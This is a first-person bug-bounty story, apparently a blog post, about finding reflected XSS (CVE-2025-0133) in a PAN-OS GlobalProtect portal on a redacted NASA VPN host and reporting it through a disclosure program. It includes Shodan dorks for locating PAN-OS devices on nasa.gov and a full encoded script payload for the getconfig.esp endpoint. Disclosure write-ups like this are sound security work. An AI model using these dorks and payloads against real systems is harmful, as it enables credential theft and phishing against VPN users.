🌌 Introduction

Bug hunting is unpredictable. Sometimes you find a bug in 5 minutes… sometimes you spend 5 days with nothing. And sometimes, you find a bug at midnight, lying on your bed, staring at the ceiling wondering what your life is.

That's exactly how this story begins.

This is the journey of how I discovered a real-world vulnerability — CVE-2025–0133 — on a major space agency system (target redacted for safety). And yes… I received an official Appreciation Letter, which is now proudly framed on my wall.

🛡️ About CVE-2025–0133

Type: Reflected Cross-Site Scripting (XSS) Component: Palo Alto Networks PAN-OS GlobalProtect Severity: Medium

🔍 What this vulnerability allows

Because of improper sanitization, an attacker can craft a link that causes the browser of an authenticated Captive Portal user to execute malicious JavaScript. This can lead to:

• Credential theft
• Phishing attacks
• Clientless VPN compromise

A simple reflected XSS — but on a very sensitive system.

🌙 The Late-Night Spark

Time: 11:00 PM Mood: Mentally offline Brain: "Chal Ajay… NASA par hunt karke dekh. This time bug leke hi uthna hai!"

Earlier, I had tried hunting on the same program but only received:

• ❌ Duplicates
• ❌ Informative
• ❌ Not applicable

But that night, I looked at my empty wall and thought:

"Yaar… ek NASA Appreciation Letter yahan frame ho jaye na… life sorted!" 😭❤️

So I opened my laptop again, switched on my playlist, and started hunting.

🎧 Music ON → Talwinder Mashup → Focus Mode Activated

I opened Shodan and started experimenting with multiple dorks. Nothing useful.

Then a spark hit me:

"Arre… CVE-2025–0133! I have already made a full YouTube video on this!"

That instantly refreshed the entire exploit logic in my mind. So I used the basic PAN-OS dork:

cpe:"cpe:2.3:o:paloaltonetworks:pan-os"

Good results. Then I customized it for NASA systems:

cpe:"cpe:2.3:o:paloaltonetworks:pan-os" hostname:"nasa.gov"

I got 11 results. Excitement UP. Confidence DOWN (thoda darr bhi laga 😅).

I tried 5–6 hosts. Nothing worked. I almost closed the laptop.

But suddenly my inner bug hunter whispered:

"Bhai, bas last 3 targets aur check kar… ho sakta hai wahi pe magic ho."

And that changed everything.

💥 The Breakthrough on IP *. *2.**5.208

One result showed:

https://*.*2.**5.208/global-protect/login.esp

I replaced the path with the vulnerable endpoint:

🔥 Vulnerable Endpoint

/ssl-vpn/getconfig.esp

🎯 Payload I used

/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22CyberTechAjju%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer

Hit Enter…

💥 XSS POPPED! The prompt executed with my custom message "CyberTechAjju."

At this moment, my reaction was literally:

"Abe ye toh Mil gaya!"

But wait — this was the IP. I still needed to verify it on the original domain.

🌐 Testing on the Actual Domain

I replaced the IP with the real redacted domain: vpn.*.*.nasa.gov

Used the same endpoint. Same payload. Reloaded…

🔥 BOOM AGAIN! VALID XSS!

This was it. Fully reproducible. Fully valid. Fully responsible-disclosure worthy.

📨 Submitting the Report

I immediately submitted my findings through the official Bugcrowd VDP around 2:00 AM. Then finally slept.

Next evening — Email came:

"Your submission has been triaged."

Confidence level = +1000 Energy level = +500 Sleep level = 0 😂

But the real moment came on 16 October:

"Please accept this letter as a token of our appreciation…"

An official Appreciation Letter PDF. Yes — from NASA.

I got it printed the same day, visited a carpenter, and said:

"Uncle ji, ek badiya sa frame de do."

Paid ₹300 without bargaining (rare moment 😂). And the next morning…

📌 NASA's Appreciation Letter was hanging proudly on my wall.

Dream achieved.

🔗 Want to Understand the CVE?

I already created a detailed YouTube video on CVE-2025–0133. Watch it here:

👉 https://youtu.be/s_8oj1hWLU0?si=2W04GeHnIft2bkqY

💡 Key Takeaways

• Never underestimate a midnight thought.
• Always check that "last 3 targets."
• Your playlist can save your bug hunting career.
• Persistence beats luck.
• Shodan + CVE knowledge = 🔥 combinations.
• Even the biggest organizations can be vulnerable.

🔥 Final Words

Bug hunting is not just about skills — it's about mindset, consistency, and passion. And if you're reading this, remember:

"Keep Learning, Keep Hacking." — CyberTechAjju

Your achievement wall may be empty today, but one valid bug report can turn it into a story of pride.

Keep pushing. Your NASA moment is waiting. 🚀❤️